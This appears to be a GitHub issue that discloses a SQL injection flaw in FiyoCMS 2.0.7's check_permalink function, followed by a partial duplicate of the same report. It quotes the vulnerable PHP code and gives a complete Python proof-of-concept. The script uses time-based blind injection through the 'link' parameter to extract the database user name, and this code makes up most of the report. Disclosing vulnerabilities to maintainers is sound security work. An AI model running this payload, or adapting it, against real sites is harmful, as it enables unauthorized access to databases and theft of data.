Good day.
I found a SQL injection vulnerability in FiyoCMS 2.0.7.This vulnerability allows remote authenticated attackers to obtain information in the context of the user used by the application to retrieve data from the database.
There is no need to login in when exploiting this vulnerability
Noticed that the function check_permalink Put the parameters $_REQUEST['link'] into the database query without filtered
file:
system/function.php
function check_permalink($field,$value ,$output = null, $like = null) {
if(empty($like))
$link = FQuery("permalink","$field = '$value'",$output);
else
$link = FQuery("permalink","$field LIKE '%$value%'",$output);
if(empty($value) or empty($link))
$link = false;
else if(empty($output) AND $link > 0)
$link = true;
return $link;
}
Python poc code:
import requests
import time
if __name__ == '__main__':
Target_url = 'http://127.0.0.1/www/cve/FiyoCMS-1669403ec38e3f100d17786e06bc33c94152fcf3/'
print 'Began to guess the length of the database user name !!'
for x in range(50):
start_time = time.time()
payload = '''?link=u'union/**/select/**/1,2,3,4,0/**/or/**/if(length(user())={x},sleep(0.3),0)/**/or/**/0,'6'''.format(x=x)
headers = {'Referer': Target_url}
response = requests.get(
Target_url + '/' + payload,
headers=headers)
end_time = time.time()
if (end_time - start_time) > 1:
length = x
break
print 'The database user name length is {length} !!'.format(length=length)
print 'Start guessing the database username !!'
username = ''
for x in range(length + 1):
pay_str = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
for p in pay_str:
start_time = time.time()
headers = {'Referer': Target_url}
payload = '''?link=u'union/**/select/**/1,2,3,4,0/**/or/**/if(substr(user(),{q},1)='{w}',sleep(0.3),0)/**/or/**/0,'6'''.format(q=x, w=p)
response = requests.get(
Target_url + '/' + payload,
headers=headers)
end_time = time.time()
if (end_time - start_time) > 1:
username = username + p
print username
break
print 'The database user name is {username}'.format(username=username)
I hope you can fix it as soon as possible,if there are any questions, please send me the details to my email at xm001test@gmail.com
The text was updated successfully, but these errors were encountered:
Good day.
I found a SQL injection vulnerability in FiyoCMS 2.0.7.This vulnerability allows remote authenticated attackers to obtain information in the context of the user used by the application to retrieve data from the database.
There is no need to login in when exploiting this vulnerability
File location: /system/site.php
Noticed that the function check_permalink Put the parameters $_REQUEST['link'] into the database query without filtered
file:
system/function.php
Python poc code:
I hope you can fix it as soon as possible,if there are any questions, please send me the details to my email at xm001test@gmail.com
The text was updated successfully, but these errors were encountered: